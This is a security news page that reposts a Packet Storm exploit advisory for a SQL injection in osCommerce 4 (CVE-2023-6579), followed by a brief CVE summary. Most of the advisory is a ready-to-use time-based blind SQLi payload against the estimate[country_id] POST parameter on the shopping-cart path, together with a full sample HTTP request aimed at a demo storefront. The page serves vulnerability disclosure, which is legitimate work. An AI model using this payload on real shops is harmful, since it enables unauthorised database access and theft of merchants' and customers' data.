Security
Headlines
HeadlinesLatestCVEs

Headline

osCommerce 4 SQL Injection

osCommerce version 4 suffers from a remote SQL injection vulnerability.

Packet Storm
#sql#csrf#vulnerability#windows#auth
# Exploit Title: osCommerce 4 - SQL Injection# Exploit Author: CraCkEr# Date: 22/11/2023# Vendor: osCommerce ltd.# Vendor Homepage: https://www.oscommerce.com/# Software Link: https://demo.oscommerce.com/# Demo Link: https://demo.oscommerce.com/b2b-supermarket/# Tested on: Windows 11 Home# Impact: Database Access# CWE: CWE-89 - CWE-74 - CWE-707# CVE: CVE-2023-6579# VDB: VDB-247160## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushkaCryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionSQL injection attacks can allow unauthorized access to sensitive data, modification ofdata and crash the application or make it unavailable, leading to lost revenue anddamage to a company's reputation.Path: /b2b-supermarket/shopping-cartPOST Parameter 'estimate[country_id]' is vulnerable to SQLi---Parameter: estimate[country_id] (POST)    Type: time-based blind    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)    Payload: estimate[country_id]=223'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z&estimate[post_code]=900001&estimate[shipping]=flat_flat&ajax_estimate=ajax_estimate&_csrf=7u6VPwL2TxKyd-mt8RufHw3nHwO95CIbzlY1L1y2BueKuf0MNs42S8pCnNybbOxmWaFUYcuwbiq8YAJVDNBHsw==----------------------------------------------POST /b2b-supermarket/shopping-cart HTTP/2estimate%5Bcountry_id%5D=[SQLi]&estimate%5Bpost_code%5D=900001&estimate%5Bshipping%5D=flat_flat&ajax_estimate=ajax_estimate&_csrf=7u6VPwL2TxKyd-mt8RufHw3nHwO95CIbzlY1L1y2BueKuf0MNs42S8pCnNybbOxmWaFUYcuwbiq8YAJVDNBHsw%3D%3D-------------------------------------------[-] Done

Related news

CVE-2023-6579

A vulnerability, which was classified as critical, has been found in osCommerce 4. Affected by this issue is some unknown functionality of the file /b2b-supermarket/shopping-cart of the component POST Parameter Handler. The manipulation of the argument estimate[country_id] leads to sql injection. The attack may be launched remotely. The identifier of this vulnerability is VDB-247160. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

Packet Storm: Latest News

Scapy Packet Manipulation Tool 2.6.1